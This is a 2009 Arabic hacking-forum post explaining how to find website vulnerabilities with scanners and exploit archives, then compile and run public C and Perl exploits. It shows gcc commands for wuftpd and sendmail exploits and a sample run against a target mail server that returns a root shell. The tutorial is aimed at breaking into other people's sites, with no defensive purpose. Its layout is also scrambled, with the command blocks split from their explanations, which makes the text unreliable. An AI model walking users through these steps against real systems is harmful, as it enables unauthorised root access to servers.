منتدى top dz
كيف نبحث عن ثغرات ... 613623
عزيزي الزائر / عزيزتي الزائرة يرجي التكرم بتسجبل الدخول اذا كنت عضو معنا
او التسجيل ان لم تكن عضو وترغب في الانضمام الي اسرة المنتدي
سنتشرف بتسجيلك
شكرا كيف نبحث عن ثغرات ... 829894
ادارة
المنتدي
كيف نبحث عن ثغرات ... 103798

<
منتدى top dz
كيف نبحث عن ثغرات ... 613623
عزيزي الزائر / عزيزتي الزائرة يرجي التكرم بتسجبل الدخول اذا كنت عضو معنا
او التسجيل ان لم تكن عضو وترغب في الانضمام الي اسرة المنتدي
سنتشرف بتسجيلك
شكرا كيف نبحث عن ثغرات ... 829894
ادارة
المنتدي
كيف نبحث عن ثغرات ... 103798

<
منتدى top dz
هل تريد التفاعل مع هذه المساهمة؟ كل ما عليك هو إنشاء حساب جديد ببضع خطوات أو تسجيل الدخول للمتابعة.


 
الرئيسيةأحدث الصورالتسجيلدخولدخول
المواضيع الأخيرة
»  دجي بلال -*-*-ريتم لي شاب*-*-*عباس -*-*-كثرو همومي-*-*بروجي /**لوب فرويتي/*-*-دجي بلال
كيف نبحث عن ثغرات ... I_icon_minitimeالجمعة فبراير 06, 2015 10:47 pm من طرف djalalotriste

»  ** مقطع عربي جديد و بروجي لا يفوتك رائع FL STUDIO **
كيف نبحث عن ثغرات ... I_icon_minitimeالجمعة فبراير 06, 2015 10:43 pm من طرف djalalotriste

»  PROJET ANA NA3CHAK ANA NDALAKE BYYYY FL STUDIO ILIESO+le projjjetttt
كيف نبحث عن ثغرات ... I_icon_minitimeالجمعة فبراير 06, 2015 10:40 pm من طرف djalalotriste

»  PROJET HASNI SGHIR LABGHA TJIBI DRAHEM BOK BY SABRI IN FL STUDIO
كيف نبحث عن ثغرات ... I_icon_minitimeالجمعة فبراير 06, 2015 10:39 pm من طرف djalalotriste

»  cheb hasni ghir la tebkich بروجي - شاب حسني-لا تبكيش-flp
كيف نبحث عن ثغرات ... I_icon_minitimeالجمعة فبراير 06, 2015 10:34 pm من طرف djalalotriste

»  PROJET CHEBE AJALE 2013 KHALTI NAIMA BYYYY FL STUDIO ILIESO
كيف نبحث عن ثغرات ... I_icon_minitimeالأربعاء أبريل 23, 2014 5:14 pm من طرف imad0012

» Dj N 2013 berouali
كيف نبحث عن ثغرات ... I_icon_minitimeالخميس مارس 27, 2014 10:08 pm من طرف samer27000

»  مجموعات لوبات هيب هوب راب مطولة هدية لكم
كيف نبحث عن ثغرات ... I_icon_minitimeالخميس مارس 27, 2014 10:05 pm من طرف samer27000

»  ** الشعبي المغربي في برنامج FL STUDIO + بروجي **
كيف نبحث عن ثغرات ... I_icon_minitimeالخميس مارس 27, 2014 9:53 pm من طرف samer27000

» REMEX + إيفاع كمال الفالمي طالع نشكي +فواز لاكلاس)**************
كيف نبحث عن ثغرات ... I_icon_minitimeالسبت يناير 18, 2014 1:26 pm من طرف sauvage.barbare

كيف نبحث عن ثغرات ... Fb110

 

 كيف نبحث عن ثغرات ...

اذهب الى الأسفل 
كاتب الموضوعرسالة
ali bedarnia

كيف نبحث عن ثغرات ... 8
avatar


كيف نبحث عن ثغرات ... 56410
ذكر
عدد الرسائل : 37
العمر : 32
كيف نبحث عن ثغرات ... 56411
مزاج : كيف نبحث عن ثغرات ... 310
نقاط : 54074
عارض احترام القونين كيف نبحث عن ثغرات ... 111010
السٌّمعَة 0
رسالة sms النص
( mms ) : كيف نبحث عن ثغرات ... Aa33
تاريخ التسجيل : 10/08/2009

كيف نبحث عن ثغرات ... Empty
مُساهمةموضوع: كيف نبحث عن ثغرات ...   كيف نبحث عن ثغرات ... I_icon_minitimeالثلاثاء أغسطس 18, 2009 9:38 am

كيف نبحث عن ثغرات ...

هذا الجزء أكبر من أن يوضع في كتاب ...... لذلك سوف أحاول أن أكتب هذا المقطع بالمختصر المفيد



هناك العديد من البرامج لمعرفة ثغرات الموقع ...

في الحقيقة برنامجي المفضل هو [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]



إن لم تجد في الموقعين إبحث هنا [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]





PHP - CGI - UNICODE - VB ... etc فاستغلالها يتم من المتصفح ...



إن وجدت سيكربتات مكتوبة بلغة السي لإستثمار ثغرة ما فاستخدامها كالتالي

أولا : قم بتحويلها إلى ملف تنفيذي بواسطة الأمر

gcc -o file file.c



gcc -o wuftpd-2.6.0 wuftpd-2.6.0.c



./wuftpd-2.6.0



$ gcc -o sendmail sendmail.c

$ ./sendmail

Usage : sendmail

$ ./sendmail smtp.targetdomain.com RedHat-6.2 anonymous anonymous

connecting to host...

connected...

id

uid=0(root) gid=0(root)





sendmail



بعد أن نفذنا هذا ... قام البرنامج بتنفيذ هجوم طفح الدارئ وأعطانا امتيازات root







./file.pl



Access Denied



chmod +x file.pl



هنا مثالين لملف قام بالعمل بشكل صحيح وآخر أظهر رسالة الخطأ المذكورة

$ ./apache.pl

Usage: apache



$ ./ftpd.pl

Access Denied.

$ chmod +x ftpd.pl

$ ./ftpd.pl

Usage:

host target host name

OS:

1 Linux Red Hat 6.2

2 OpenLinux 2.3

[so on]







بإمكانك أيضا استخدام البرنامج Nessus من الموقع



بعد العثور على ثغرة ما في موقع ... قم بالذهاب إلى أحد الموقعين التاليين





للبحث عن ثغرات للبرنامج ... إذهب للموقع الثاني أولا فهو أصغر ... إن لم تجد إذهب للأول فهو الأفضل والأكبر ...




لنترك البحث ونركز على الاستخدام ... إن كنت وجدت أحد هذه الثغرات







مثلا


وبعد أن يتم التحويل قم باستخدامها بالأمر


وسوف تظهر لك طريقة الإستعمال ... مثلا











لاحظ أن في هذه الثغرة طلب اسم ملقم البريد الذي يشغل برنامج


ونظام التشغيل وكذلك اسم مستخدم وكلمة مرور ...




قد تجد أحيانا سيكربت خاص بثغرة ما مكتوب بلغة Perl

استخدامه كالآتي


إن أعطاك الرسالة


اكتب الأمر


وقم بتشغيله مرة أخرى




كما ترى قام بالعمل بشكل صحيح ... لنرى المثال الآخر













كيف نبحث عن ثغرات ... Matrix_reloaded
الرجوع الى أعلى الصفحة اذهب الى الأسفل
 
كيف نبحث عن ثغرات ...
الرجوع الى أعلى الصفحة 
صفحة 1 من اصل 1

صلاحيات هذا المنتدى:لاتستطيع الرد على المواضيع في هذا المنتدى
منتدى top dz :: الكمبيوتر و الانترنت :: =-- ( الهـكـرز والإختــراق )-
انتقل الى: